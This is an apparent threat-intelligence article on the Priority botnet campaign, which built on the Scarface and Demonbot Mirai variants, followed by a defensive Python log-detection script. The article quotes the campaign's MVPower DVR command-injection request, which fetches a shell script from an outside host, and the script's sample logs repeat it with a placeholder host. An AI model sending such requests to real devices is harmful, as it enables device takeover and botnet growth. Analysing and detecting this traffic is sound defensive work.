Scarface Botnet Description
When the source code of a malware threat is either leaked or released to the public by its own developers, even inexperienced threat actors can take it, adjust it to suit their needs and unleash it in the wild. This exact pattern has been observed many times since the code of the infamous Mirai botnet was published on hacker forums back in 2016.
A threat actor identifying itself as Priority is behind an attack campaign involving two different Mirai variants. The first payload it deployed was based on the Demonbot Mirai variant and focused specifically on Hadoop attacks. The second payload, adopted later in the campaign, is far more advanced and is based on the Mirai variant developed by Scarface. Scarface is a known malware developer who took the Mirai code and attempted to make it more easily accessible to novice hackers, while also tailoring the threat to infect Internet of Things (IoT) devices.
The Priority campaign scans for five ports - 500, 5501, 5502, 5050 and 60001 - and attacks each of them with a single HTTP request: 'GET /shell?cd%20/tmp;%20wget%20http://45(.)13.58.4/TPJ.sh;'. According to the infosec analysts who analyzed the Priority campaign, the attacker appears to have a specific goal in mind, because port 60001 is the primary target while the other four serve more as a distraction than anything else. In addition, they determined that Priority must be rather inexperienced, as evidenced by the fact that only a single vulnerability was exploited as the compromise vector - MVPower DVR Shell Unauthenticated Command Execution - instead of the usual amount of between 3 and 7 exploits found in other similar threats.
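The request pattern above is easy to spot in web or honeypot logs once the percent-encoding is undone. The following detection script is an added example, not code from the article or from any of the analysts it cites; the log line format and the placeholder host payload.invalid are assumptions.

```python
"""Added detection example for the Priority campaign traffic described above.
It is not code from the article; the log format is an assumption."""
import re
from urllib.parse import unquote

# Ports the article says the campaign scans; 60001 is the primary target.
PRIORITY_PORTS = {500, 5501, 5502, 5050, 60001}
PRIMARY_PORT = 60001
# Download tools that mark the request as a dropper rather than a bare probe.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b")
# Assumed log format: "<client ip> <destination port> \"<request line>\"".
LINE_RE = re.compile(r'^(\S+) (\d+) "(\S+) (\S+) [^"]*"$')

# Constructed sample lines; payload.invalid is a placeholder host standing in
# for the defanged address quoted in the article.
SAMPLE_LOG = """\
203.0.113.7 60001 "GET /shell?cd%20/tmp;%20wget%20http://payload.invalid/TPJ.sh; HTTP/1.1"
203.0.113.7 5050 "GET /shell?cd%20/tmp;%20wget%20http://payload.invalid/TPJ.sh; HTTP/1.1"
198.51.100.9 80 "GET /index.html HTTP/1.1"
198.51.100.9 8080 "GET /shell?id HTTP/1.1"
"""

def classify_request(src, port, target):
    """Return a finding for an MVPower-style /shell?<cmd> request, else None."""
    decoded = unquote(target)          # undo %20 etc. before inspecting
    if not decoded.startswith("/shell?"):
        return None
    command = decoded.split("?", 1)[1]
    stage = "dropper" if DOWNLOADER_RE.search(command) else "probe"
    return {"src": src, "port": port, "stage": stage, "command": command,
            "priority_port": port in PRIORITY_PORTS,
            "primary_target": port == PRIMARY_PORT}

def scan_log(text):
    """Parse every line and collect the suspicious requests in order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines that do not fit the assumed format
        src, port, _method, target = m.groups()
        hit = classify_request(src, int(port), target)
        if hit:
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} -> :{f['port']} {f['stage']} {f['command']!r}")
```

A hit on port 60001 whose decoded command fetches TPJ.sh matches the campaign's fingerprint exactly; hits on other ports still indicate an exposed MVPower DVR shell endpoint worth isolating.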
All of the initial attacks were launched from a single IP address hosted on a Virtual Private Server (VPS) provided by Digital Ocean. Hackers often resort to VPS hosting because of the flexibility it provides: a server can be set up quickly and purged just as fast.